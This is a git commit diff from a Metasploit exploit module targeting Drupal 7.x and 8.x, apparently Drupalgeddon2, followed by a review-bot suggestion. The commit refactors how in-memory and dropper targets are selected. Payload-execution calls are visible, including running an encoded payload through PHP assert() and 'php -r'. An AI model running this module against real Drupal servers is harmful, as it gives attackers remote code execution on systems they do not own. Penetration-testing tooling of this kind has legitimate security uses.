Set target type instead of regexing names

We're no longer matching multiple targets like /In-Memory/ or /Dropper/,
so it makes sense to match on a specific value now.

Old matching in this commit: 1900aa2708.
GSoC/Meterpreter_Web_Console
William Vu 2018-04-25 11:53:26 -05:00
parent 675ed78948
commit b8eb7f2a86
1 changed files with 28 additions and 16 deletions


@ -53,19 +53,23 @@ class MetasploitModule < Msf::Exploit::Remote
#
['Automatic (PHP In-Memory)',
'Platform' => 'php',
'Arch' => ARCH_PHP
'Arch' => ARCH_PHP,
'Type' => :php_memory
],
['Automatic (PHP Dropper)',
'Platform' => 'php',
'Arch' => ARCH_PHP
'Arch' => ARCH_PHP,
'Type' => :php_dropper
],
['Automatic (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD
'Arch' => ARCH_CMD,
'Type' => :unix_memory
],
['Automatic (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64]
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
],
#
# Drupal 7.x targets (PHP, cmd/unix, native)
@ -73,22 +77,26 @@ class MetasploitModule < Msf::Exploit::Remote
['Drupal 7.x (PHP In-Memory)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :php_memory
],
['Drupal 7.x (PHP Dropper)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :php_dropper
],
['Drupal 7.x (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :unix_memory
],
['Drupal 7.x (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Version' => Gem::Version.new('7.x')
'Version' => Gem::Version.new('7.x'),
'Type' => :linux_dropper
],
#
# Drupal 8.x targets (PHP, cmd/unix, native)
@ -96,22 +104,26 @@ class MetasploitModule < Msf::Exploit::Remote
['Drupal 8.x (PHP In-Memory)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :php_memory
],
['Drupal 8.x (PHP Dropper)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :php_dropper
],
['Drupal 8.x (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :unix_memory
],
['Drupal 8.x (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Version' => Gem::Version.new('8.x')
'Version' => Gem::Version.new('8.x'),
'Type' => :linux_dropper
]
],
'DefaultTarget' => 0, # Automatic (PHP In-Memory)
@ -168,8 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote
end
# NOTE: assert() is attempted first, then PHP_FUNC if that fails
case target.name
when /PHP In-Memory/
case target['Type']
when :php_memory
execute_command(payload.encoded, func: 'assert')
sleep(wfs_delay)
@ -177,9 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote
# XXX: This will spawn a *very* obvious process
execute_command("php -r '#{payload.encoded}'")
when /Unix In-Memory/
when :unix_memory
execute_command(payload.encoded)
when /PHP Dropper/, /Linux Dropper/
when :php_dropper, :linux_dropper
dropper_assert
sleep(wfs_delay)
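Review bot: The `case target['Type']` in the last two hunks has no visible fallback, so a target entry defined without a 'Type' key, or with a misspelled symbol, would match none of the `when` arms and the method would return without running anything or saying why. Under the old name regexes a new target was covered as long as its name followed the pattern, whereas the symbol match makes 'Type' a required key on every entry in the Targets list. Consider closing the case with `else` followed by `fail_with(Failure::BadConfig, "Unsupported target type: #{target['Type'].inspect}")`, and adding a one-line comment above the Targets list such as `# Every target must set 'Type'; exploit dispatches on it`. The `case` ends outside the last hunk, so an `else` arm may already exist there.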